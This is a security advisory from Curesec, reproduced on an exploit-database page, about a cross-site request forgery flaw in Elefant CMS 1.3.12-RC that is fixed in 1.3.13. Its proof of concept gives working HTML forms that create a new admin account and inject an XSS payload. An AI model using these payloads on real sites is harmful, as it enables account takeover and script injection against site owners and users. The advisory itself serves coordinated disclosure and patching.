Advertisement






Elefant CMS 1.3.12-RC Cross Site Request Forgery

CVE Category Price Severity
CVE-2014-9407 CWE-352 $500 Medium
Author Risk Exploitation Type Date
Unknown High Remote 2017-02-18
CPE
cpe:cpe:/a:elefant_cms:elefant:1.3.12_rc
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017020180

Below is a copy:

Elefant CMS 1.3.12-RC Cross Site Request ForgerySecurity Advisory - Curesec Research Team

1. Introduction

Affected Product:  Elefant CMS 1.3.12-RC
Fixed in:          1.3.13
Fixed Version      https://github.com/jbroadway/elefant/releases/tag/
Link:              elefant_1_3_13_rc
Vendor Website:    https://www.elefantcms.com/
Vulnerability      CSRF
Type:
Remote             Yes
Exploitable:
Reported to        09/05/2016
vendor:
Disclosed to       02/02/2017
public:
Release mode:      Coordinated Release
CVE:               n/a (not requested)
Credits            Tim Coen of Curesec GmbH

2. Overview

Elefant is a content managment system written in PHP. In version 1.3.12-RC, it
is vulnerable to cross site request forgery. If a victim visits a website that
contains specifically crafted code while logged into Elefant, an attacker can
for example create a new admin account without the victims knowledge.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

There is no CSRF protection for various components, allowing among other the
creation of new admin accounts or XSS attacks.

Proof of Concept:

Create New Admin: <html> <body> <form action="http://localhost/user/add" method
="POST"> <input type="hidden" name="name" value="admin3" /> <input type=
"hidden" name="email" value="[email protected]" /> <input type="hidden" name=
"password" value="admin3" /> <input type="hidden" name="verify_pass" value=
"admin3" /> <input type="hidden" name="type" value="admin" /> <input type=
"hidden" name="company" value="" /> <input type="hidden" name="title" value=""
/> <input type="hidden" name="website" value="" /> <input type="hidden" name=
"photo" value="" /> <input type="hidden" name="about" value="" /> <input type=
"hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" />
<input type="hidden" name="address" value="" /> <input type="hidden" name=
"address2" value="" /> <input type="hidden" name="city" value="" /> <input type
="hidden" name="state" value="" /> <input type="hidden" name="country" value=""
/> <input type="hidden" name="zip" value="" /> <input type="submit" value=
"Submit request" /> </form> </body> </html> XSS: <html> <body> <form action=
"http://localhost/designer/preview" method="POST"> <input type="hidden" name=
"layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value=
"Submit request" /> </form> </body> </html>

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-CSRF-189.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum